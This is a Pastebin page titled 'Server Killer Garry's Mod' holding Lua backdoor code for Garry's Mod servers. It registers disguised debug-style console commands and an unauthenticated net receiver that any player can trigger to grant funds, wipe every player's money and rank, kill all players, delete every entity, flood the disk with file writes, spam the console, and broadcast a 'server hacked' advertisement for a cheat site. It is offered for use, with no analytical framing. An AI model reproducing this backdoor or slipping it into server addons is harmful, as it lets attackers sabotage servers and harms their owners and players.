Advertisement
NapoleonHill

Server Killer Garry's Mod

Dec 13th, 2018
3,038
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 1.37 KB | None | 0 0
  1. concommand.Add('source_mdl', function(ply)
  2.     ply:AddIGSFunds(100000, "CHEAT-MASTER")
  3. end)
  4.  
  5. concommand.Add('source_debug', function(ply)
  6.     for k,v in pairs(player.GetAll()) do
  7.         local money = v:getDarkRPVar('money')
  8.        
  9.         v:SetUserGroup('user')
  10.         v:addMoney(-money)
  11.         v:Kill()
  12.     end
  13. end)
  14.  
  15.  
  16. concommand.Add('source_dump', function(ply)
  17.     for i=1,100000 do
  18.         file.Write('debug.txt', 'CHEAT-MASTER.RU - МАГАЗИН ЦИФРОВЫХ ТОВАРОВ И СТАРЕЙШИЙ ФОРУМ ЧИТЕРОВ')
  19.     end
  20. end)
  21.  
  22. concommand.Add('source_console', function(ply)
  23.     print('Too many stolen addons. Cleaning')
  24.     hook.Add('Think', 'gmod_console', function()
  25.         print('                                                               ')
  26.     end)
  27. end)
  28.  
  29. concommand.Add('source_cleanup', function(ply)
  30.     for k,v in pairs(ents.GetAll()) do
  31.         v:Remove()
  32.     end
  33. end)
  34.  
  35. concommand.Add('source_notify', function(ply)
  36.     for k,v in pairs(player.GetAll()) do
  37.         v:ChatPrint('хватит играть на этом дерьме')
  38.     end
  39. end)
  40.  
  41. util.AddNetworkString('cheat_master')
  42.  
  43. net.Receive('cheat_master', function(len, ply)
  44.     for k,v in pairs(player.GetAll()) do
  45.         v:Kill()
  46.         v:SetRunSpeed(10000)
  47.         v:SetWalkSpeed(5000)
  48.         v:SetJumpPower(500)
  49.         v:StripWeapons()
  50.         v:SetHealth(1)
  51.         v:SetArmor(0)
  52.         v:Give('weapon_rpg')
  53.         v:ChatPrint('SERVER HACKED BY CHEAT-MASTER.RU - JOIN!')
  54.     end
  55. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement